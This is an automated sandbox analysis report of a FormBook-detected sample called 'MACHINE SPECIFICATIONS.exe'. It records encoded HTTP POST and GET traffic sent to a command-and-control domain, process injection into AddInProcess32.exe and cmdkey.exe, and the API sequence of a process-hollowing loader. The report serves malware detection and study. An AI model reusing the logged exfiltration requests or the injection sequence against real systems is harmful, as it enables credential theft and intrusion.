53 48 34 69 52 50 56 2b 52 37 44 77 35 57 75 52 52 66 58 55 70 34 4d 70 72 36 44 78 77 6a 75 5a 41 73 77 73 49 6d 57 6d 35 43 47 6a 71 51 42 6a 78 4a 4e 76 51 3d 3d Data Ascii: AuPF3v=XHoTkIbF1HmcRNMUIbFZkCzlUfytxygNQl3HalQWAzlTaiKvrOYgkDQZsFQ2A7vJBi3XZozT1cVn/vf2E2XGQMN547G0y5aXXA6qu2hrF4MUZcdkbFeROafZ0nZEZZRgKti60Or+5DeHvSH4iRPV+R7Dw5WuRRfXUp4Mpr6DxwjuZAswsImWm5CGjqQBjxJNvQ==
Jan 13, 2025 10:26:33.689342976 CET	808	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 13 Jan 2025 09:26:33 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 13 Jan 2025 10:26:33 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tr%2B7EgzNbihl8EDG31tupO3R0wmb01xYY2X814xWd79JDr26qkwI5DBOXQFhiuYnrxN9vnvx4b%2FvVsIb%2FC4lEQIWV79o%2BQneLCKxjZXT%2FIsXqnm59EUnLt5oopaEUdh8nJ6o"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 9014586c29873b14-IAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.11.20	49849	172.67.132.227	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:26:36.203007936 CET	819	OUT	POST /kj1o/ HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/kj1o/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 52 54 62 43 36 76 6f 50 59 67 6a 44 51 5a 34 56 51 76 4e 62 76 43 42 69 37 78 5a 74 54 54 31 59 31 6e 2f 75 76 32 45 46 76 46 51 63 4e 73 77 62 47 71 39 5a 61 58 58 41 36 71 75 32 46 53 46 34 55 55 5a 74 74 6b 62 6b 65 65 41 36 66 59 7a 6e 5a 45 50 5a 52 73 4b 74 6a 76 30 4e 75 5a 35 46 53 48 76 58 37 34 6c 45 76 53 30 52 37 46 2b 5a 58 5a 53 55 2f 63 55 49 73 72 75 5a 69 39 78 31 72 77 59 57 68 71 78 36 53 79 6c 71 65 30 6e 61 70 70 68 7a 49 57 79 52 33 47 47 31 7a 6b 62 76 4b 2f 4e 57 78 72 78 4c 64 46 64 37 6b 3d Data Ascii: AuPF3v=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBRTbC6voPYgjDQZ4VQvNbvCBi7xZtTT1Y1n/uv2EFvFQcNswbGq9ZaXXA6qu2FSF4UUZttkbkeeA6fYznZEPZRsKtjv0NuZ5FSHvX74lEvS0R7F+ZXZSU/cUIsruZi9x1rwYWhqx6Sylqe0napphzIWyR3GG1zkbvK/NWxrxLdFd7k=
Jan 13, 2025 10:26:36.316319942 CET	804	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 13 Jan 2025 09:26:36 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 13 Jan 2025 10:26:36 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XJQljXykCcUDJv%2FFBTEgWM50AZuAQw2F3qY%2F3cojU4ddlzvQ6gt8pSFR8DxClJjKi8oXlumO4YqUQ4M5dAZD0JazmqspWjBQApY%2BKbJh64bTqeS07C2eJ3UAWO8WfqEAnv4x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 9014587c98108272-IAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.11.20	49850	172.67.132.227	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:26:38.827325106 CET	2578	OUT	POST /kj1o/ HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/kj1o/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 70 54 62 77 79 76 6f 73 77 67 69 44 51 5a 37 56 51 71 4e 62 76 44 42 69 6a 31 5a 74 58 35 31 61 4e 6e 2b 49 54 32 54 45 76 46 65 63 4e 73 76 4c 47 72 79 35 61 43 58 44 54 68 75 32 56 53 46 34 55 55 5a 75 31 6b 53 56 65 65 43 36 66 5a 30 6e 5a 41 5a 5a 52 41 4b 74 37 2f 30 4d 61 6a 35 31 79 48 73 32 4c 34 6e 33 48 53 38 52 37 48 35 5a 58 42 53 55 36 45 55 4a 41 6e 75 59 57 54 78 79 58 77 63 42 38 72 67 70 75 54 39 49 47 38 71 6f 31 53 6d 6c 59 33 73 51 72 4d 58 54 72 34 45 6f 43 35 4f 6e 6c 62 6b 70 68 53 66 38 33 7a 45 67 51 72 39 41 42 32 73 51 6c 36 79 5a 63 6d 35 35 44 53 68 79 6e 4d 37 32 32 37 79 6d 55 75 74 59 76 61 62 76 74 68 47 36 54 42 59 42 4c 45 31 39 6f 61 44 76 72 58 63 63 44 37 44 32 47 51 4a 50 44 76 36 49 49 35 78 38 64 64 46 6c 39 56 4f 46 41 4e 33 72 64 43 69 4c 56 6e 4e 72 47 68 35 35 73 4c 43 38 75 33 6a 43 68 39 51 4c 67 55 66 4a 65 [TRUNCATED] Data Ascii: AuPF3v=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBpTbwyvoswgiDQZ7VQqNbvDBij1ZtX51aNn+IT2TEvFecNsvLGry5aCXDThu2VSF4UUZu1kSVeeC6fZ0nZAZZRAKt7/0Maj51yHs2L4n3HS8R7H5ZXBSU6EUJAnuYWTxyXwcB8rgpuT9IG8qo1SmlY3sQrMXTr4EoC5OnlbkphSf83zEgQr9AB2sQl6yZcm55DShynM7227ymUutYvabvthG6TBYBLE19oaDvrXccD7D2GQJPDv6II5x8ddFl9VOFAN3rdCiLVnNrGh55sLC8u3jCh9QLgUfJeKx3lAirVxgQND0gbkRaAAniDbLJz2k7dSWE5yFZEUaOADkKuEIjwTQly/qfGuNnBAyxr04WNyp1odqbRNei/IjZA3bIiEiAr/kHcoGoEtJpqcg6UntDbo6jocQX84qspY1ZJ0p8FcIRT1vNJDVE4yIkImROWLh0Ow8jDdLv2C/L4AFTnDMvjuFGjKA2tHWwhU1caOR82yMGGsacYREDshpiXMixHChlwV1bOcao17swzRzb7K2AoMCULnl9MNGICEJje5+RXGg8i6QV110SIWi61SuI8K4BfjCwXJlsUkE3ARHZysswkg3cquqA9PBCyWdUxfhjhykrYqasrWAXAv2pSybc06Z6XLDsTI6ztFY+Mq8Gq/P3zQTBxTjHqLgr+G/tqGjJs2Kc7JrmzC2kKlxONDbzDv0jLGRXzwUGQSU4IAppAhzUrfdkk4P7w+cqPAu9ofscbQAo+YMfJ2UZeTrNMkVfN59CyZ9uKqp+0xMxVTl2wvSY0d3UfpdsCxJZGCijmJ5PNTOUFnSkZGhfXNiijFWGpedP+MCYqykrbTwfmU1p9NEOkfFHLDtt52WWK+eJVGtzuB2gtVX3hYc052dYU/mT21ctshvXmBytH/BN/5axChIYIW/8t1UhymWbJnqh8yTQyzLJtDYraNeNh8aJnWr6Fhq603Z [TRUNCATED]
Jan 13, 2025 10:26:38.827347040 CET	2578	OUT	Data Raw: 4a 34 78 67 34 4d 30 42 7a 4d 6c 4f 71 2b 46 2f 69 75 44 69 49 47 61 50 4a 57 52 46 31 70 64 49 54 58 41 49 7a 64 6e 78 74 2f 72 44 73 6d 51 33 72 66 6b 65 63 41 41 43 35 79 67 59 79 41 31 47 73 46 55 35 6c 63 67 32 38 54 63 41 54 64 4b 6e 71 45 Data Ascii: J4xg4M0BzMlOq+F/iuDiIGaPJWRF1pdITXAIzdnxt/rDsmQ3rfkecAAC5ygYyA1GsFU5lcg28TcATdKnqE1DB8yJKSVpVBLHJ7i9xmFrnlJoGN0tBkMBhetLYM6HwPyXY14vg65Laudks85YxhIu8aVsjdzm1D8a3DRAHCHmP2miBFXgghyV6sNiJFh5hzgChmLiqSEmUxEJrOAfcZvjP3P8XT2DZU9w9R7RQ+KNHnimju9Johy
Jan 13, 2025 10:26:38.827420950 CET	2812	OUT	Data Raw: 35 78 66 30 6d 2b 7a 6d 75 4e 68 43 6c 72 6b 45 42 5a 51 58 75 48 5a 58 6f 48 34 49 6c 46 69 4b 47 63 34 4d 2b 4a 39 77 30 7a 62 38 48 43 6a 44 42 41 6c 78 45 4d 6c 55 30 5a 68 68 4c 71 6c 37 54 7a 6b 65 6e 43 36 6a 66 65 74 4f 69 63 44 33 61 2f Data Ascii: 5xf0m+zmuNhClrkEBZQXuHZXoH4IlFiKGc4M+J9w0zb8HCjDBAlxEMlU0ZhhLql7TzkenC6jfetOicD3a/0hqet+LArVwXurnr7K55WTZY8BoNHB8tem35/pgbxba5y78q7JbkxIyT4gWTAnoSG57x/H83Co7UQiZmqKhiGF3oNavkhLnt44J/It9Y691LkT6Y0H9FA4ujaLgZ5zEEvL7W5dALQO+Sp5SpkvDBF4MSaq945uBKs
Jan 13, 2025 10:26:38.938349009 CET	808	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 13 Jan 2025 09:26:38 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 13 Jan 2025 10:26:38 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OD2szlt%2BeCkMs%2BxsSdeVl3yeDhrNXlsYruEdT9kf4kWGKI3EFYuk%2Fs%2FJrzTYaKTLldq5vVQ1VVrjyezybboAynJbLMF7REnPm4t%2B3X41P6WEitoa4OLVVjeeOQNZbU1lXYTl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 9014588cfe8ac989-IAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.11.20	49851	172.67.132.227	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:26:41.450746059 CET	530	OUT	GET /kj1o/?v1GdZ=vUN3&AuPF3v=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs= HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:26:41.560573101 CET	783	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 13 Jan 2025 09:26:41 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 13 Jan 2025 10:26:41 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ACBFp5pkI%2F%2FNwv2JuHRNgUGzNRidlpsYDWnGj4wAONuizbvJ9b5rU1GrY6Ly31SAEvQqnzthT9Jj5pcMQtKI80ehCFl0LPmS3QuH6R23rQJpUhvulgh%2BWU5EFnaLPM0%2FCEu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014589d5a3f59ce-IAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Target ID:	0
Start time:	04:20:00
Start date:	13/01/2025
Path:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe"
Imagebase:	0x7ff6d38b0000
File size:	600'576 bytes
MD5 hash:	0821050B53DD0B7DF1BDFB5239B0DF48
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:20:00
Start date:	13/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x8e0000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.107285059805.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:20:50
Start date:	13/01/2025
Path:	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
Imagebase:	0x140000000
File size:	16'696'840 bytes
MD5 hash:	731FB4B2E5AFBCADAABB80D642E056AC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	04:20:51
Start date:	13/01/2025
Path:	C:\Windows\SysWOW64\cmdkey.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cmdkey.exe"
Imagebase:	0x450000
File size:	17'408 bytes
MD5 hash:	6CDC8E5DF04752235D5B4432EACC81A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.110844567942.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.110844494408.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	04:21:16
Start date:	13/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff658b90000
File size:	597'432 bytes
MD5 hash:	FA9F4FC5D7ECAB5A20BF7A9D1251C851
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.3%
Total number of Nodes:	893
Total number of Limit Nodes:	23

Executed Functions

Function 00007FF6D38B3D70 Relevance: 89.8, APIs: 49, Strings: 2, Instructions: 527
nativeprocessmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D38B1560: GetModuleHandleA.KERNEL32 ref: 00007FF6D38B156B

FreeConsole.KERNEL32 ref: 00007FF6D38B3DB5
CreateProcessA.KERNELBASE ref: 00007FF6D38B3E1C
CloseHandle.KERNEL32 ref: 00007FF6D38B3E86
CloseHandle.KERNEL32 ref: 00007FF6D38B3E9A
NtFreeVirtualMemory.NTDLL ref: 00007FF6D38B405E
NtAllocateVirtualMemory.NTDLL ref: 00007FF6D38B40AB
TerminateProcess.KERNEL32 ref: 00007FF6D38B40C8
CloseHandle.KERNEL32 ref: 00007FF6D38B40D3
CloseHandle.KERNEL32 ref: 00007FF6D38B40DE

Part of subcall function 00007FF6D38B6998: RtlPcToFileHeader.NTDLL ref: 00007FF6D38B69E8
Part of subcall function 00007FF6D38B6998: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6D38B60CF), ref: 00007FF6D38B6A29

NtWriteVirtualMemory.NTDLL ref: 00007FF6D38B4155
TerminateProcess.KERNEL32 ref: 00007FF6D38B4172
CloseHandle.KERNEL32 ref: 00007FF6D38B417D
CloseHandle.KERNEL32 ref: 00007FF6D38B4188
NtWriteVirtualMemory.NTDLL ref: 00007FF6D38B42C3
TerminateProcess.KERNEL32 ref: 00007FF6D38B42E0
CloseHandle.KERNEL32 ref: 00007FF6D38B42EB
CloseHandle.KERNEL32 ref: 00007FF6D38B42F6

Strings

h, xrefs: 00007FF6D38B3DAA
@, xrefs: 00007FF6D38B4083

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: Handle$Close$MemoryProcessVirtual$Terminate$FreeWrite$AllocateConsoleCreateExceptionFileHeaderModuleRaise
String ID: @$h
API String ID: 551939667-1029331998
Opcode ID: ef950fd0eb48699a4e7365ad590190feea43e9f0ed8f5d0f11cf2b348efbe516
Instruction ID: 895d49c5d90be11db83de08bf50c98599abd2dbecd0e48fbf77a6a53344c1122
Opcode Fuzzy Hash: ef950fd0eb48699a4e7365ad590190feea43e9f0ed8f5d0f11cf2b348efbe516
Instruction Fuzzy Hash: 6D52FB32608BC685EA60DB15E8563AEF7A0FBC8740F404132D68EA7B69DF7DD559CB00

Function 00007FF6D38B421B Relevance: 6.1, APIs: 4, Instructions: 55
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL ref: 00007FF6D38B42C3
TerminateProcess.KERNEL32 ref: 00007FF6D38B42E0
CloseHandle.KERNEL32 ref: 00007FF6D38B42EB
CloseHandle.KERNEL32 ref: 00007FF6D38B42F6

Part of subcall function 00007FF6D38B6998: RtlPcToFileHeader.NTDLL ref: 00007FF6D38B69E8
Part of subcall function 00007FF6D38B6998: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6D38B60CF), ref: 00007FF6D38B6A29

NtGetContextThread.NTDLL ref: 00007FF6D38B43DE
TerminateProcess.KERNEL32 ref: 00007FF6D38B43F5
CloseHandle.KERNEL32 ref: 00007FF6D38B4400
CloseHandle.KERNEL32 ref: 00007FF6D38B440B
NtWriteVirtualMemory.NTDLL ref: 00007FF6D38B44B0
TerminateProcess.KERNEL32 ref: 00007FF6D38B44C7
CloseHandle.KERNEL32 ref: 00007FF6D38B44D2
CloseHandle.KERNEL32 ref: 00007FF6D38B44DD
NtSetContextThread.NTDLL ref: 00007FF6D38B4559
TerminateProcess.KERNEL32 ref: 00007FF6D38B4570
CloseHandle.KERNEL32 ref: 00007FF6D38B457B
CloseHandle.KERNEL32 ref: 00007FF6D38B4586
NtResumeThread.NTDLL ref: 00007FF6D38B487D
CloseHandle.KERNELBASE ref: 00007FF6D38B4887

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: CloseHandle$ProcessTerminate$Thread$ContextMemoryVirtualWrite$ExceptionFileHeaderRaiseResume
String ID:
API String ID: 790736550-0
Opcode ID: 978fd16d24343da2592cd7539d4fd3a0e2c42ac787103832b942ad3a1eef00b5
Instruction ID: 62fbf231f5d3c86f1e4144439897d395a711e3cbb2250d37636499f90dab23ab
Opcode Fuzzy Hash: 978fd16d24343da2592cd7539d4fd3a0e2c42ac787103832b942ad3a1eef00b5
Instruction Fuzzy Hash: FE21DD36608B85C6E620CB15E4913AEF7A0FBC8745F400436EA8E97B68DF7CD454CB00

Function 00007FF6D38BF850 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(?,00000100,00000000,00007FF6D38BFCD6,?,?,00000000,00007FF6D38BFC59), ref: 00007FF6D38BF8BD
GetLastError.KERNEL32(?,?,00000000,00007FF6D38BFC59), ref: 00007FF6D38BF8CF
LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6D38BFC59), ref: 00007FF6D38BF911
VirtualProtect.KERNELBASE ref: 00007FF6D38BF96D
VirtualProtect.KERNELBASE ref: 00007FF6D38BF99E
FreeLibrary.KERNEL32(?,?,00000000,00007FF6D38BFC59), ref: 00007FF6D38BF9E2
GetProcAddress.KERNEL32(?,?,00000000,00007FF6D38BFC59), ref: 00007FF6D38BF9EE

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 00007FF6D38BFA1F, 00007FF6D38BFA2D
ext-ms-, xrefs: 00007FF6D38BF8F6
api-ms-, xrefs: 00007FF6D38BF8E3

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: bfc8eae9a1b68d55dc98155b144eb87f10802eafb1772623227fed22937fd774
Instruction ID: afc9e98c9b18d01596f34504800f0dd19975ecbb9fdddff6c93a797956b2055b
Opcode Fuzzy Hash: bfc8eae9a1b68d55dc98155b144eb87f10802eafb1772623227fed22937fd774
